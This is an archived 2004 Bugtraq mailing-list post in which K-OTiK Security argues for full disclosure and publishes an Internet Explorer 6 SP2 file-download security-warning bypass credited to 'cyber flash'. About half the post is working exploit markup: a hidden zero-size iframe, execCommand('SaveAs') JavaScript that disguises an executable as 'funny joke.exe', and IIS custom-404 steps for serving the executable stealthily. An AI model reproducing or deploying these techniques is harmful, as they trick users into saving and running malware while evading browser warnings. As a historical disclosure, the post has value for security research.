Microsoft Internet Explorer 6 SP2 Vulnerabilities / Full disclosure Vs. Security by Obscurity...

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Microsoft Internet Explorer 6 SP2 Vulnerabilities / Full disclosure Vs. Security by Obscurity...
From: K-OTiK Security <Special-Alerts@xxxxxxxxxx>
Date: 20 Nov 2004 05:50:23 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Let's play,

On Wednesday 17, Nov - Secunia released the advisory "Microsoft Internet 
Explorer Two Vulnerabilities", related to a vulnerability discovered by "cyber 
flash". This unpatched "file download security warning
bypass" flaw could be exploited to download a malicious executable file 
masqueraded as a "HTML document". 

Microsoft said : "Secunia you're bad, this vulnerability was not disclosed 
responsibly"

Secunia said "NO ! No ! We did not release the technical details of this flaw 
and our policy is to not reveal vulnerability details until a fix had been 
provided, unless they were already in the wild. We did not discover this 
vulnerability, so we can not censure it"

Some people said "Who is cyberflash ? perhaps Secunia discovered this flaw, but 
masked it behind a third party researcher"

K-OTik Says to "Some people" : "cyber flash is not a fictitious security 
researcher"
K-OTik Says to "MS & Secunia" : "There is no security through obscurity...and 
full disclosure is our policy"

----------------------------------------------------------------
Internet Explorer 6.0 SP2 File Download Security Warning Bypass
----------------------------------------------------------------

Exploit -> http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php
Technical Details - > 
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php

all credits go to Cyber flash A.K.A Vengy

Regards
K-OTik Security Research & Survey Team 24/7
kttp://www.k-otik.com 

<cyberflash>
The following code requires no special server setup, and should work from any 
webpage that IE 6.0 fetches:
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" 
height="0"></iframe>Click
<a href=# 
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
here</a> 

Also, here's an example that requires modifying the IIS Error Mapping 
Properties (see below):

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# 
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
 joke.exe');">
here</a>.

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:

Error Code: 404 
Default Text: Not Found 
Message Type: URL 
URL: /v.exe (name of the executable) 
Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it will 
trigger a 404 error message as defined above. But, the javascript code below 
references the stealthy v.exe data within the frame 'NotFound' and is linked to 
'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny 
joke.exe');
</cyberflash>

Prev by Date: [ GLSA 200411-28 ] X.Org, XFree86: libXpm vulnerabilities
Next by Date: [ GLSA 200411-29 ] unarj: Long filenames buffer overflow and a path traversal vulnerability
Previous by thread: [ GLSA 200411-28 ] X.Org, XFree86: libXpm vulnerabilities
Next by thread: [ GLSA 200411-29 ] unarj: Long filenames buffer overflow and a path traversal vulnerability
Index(es):
- Date
- Thread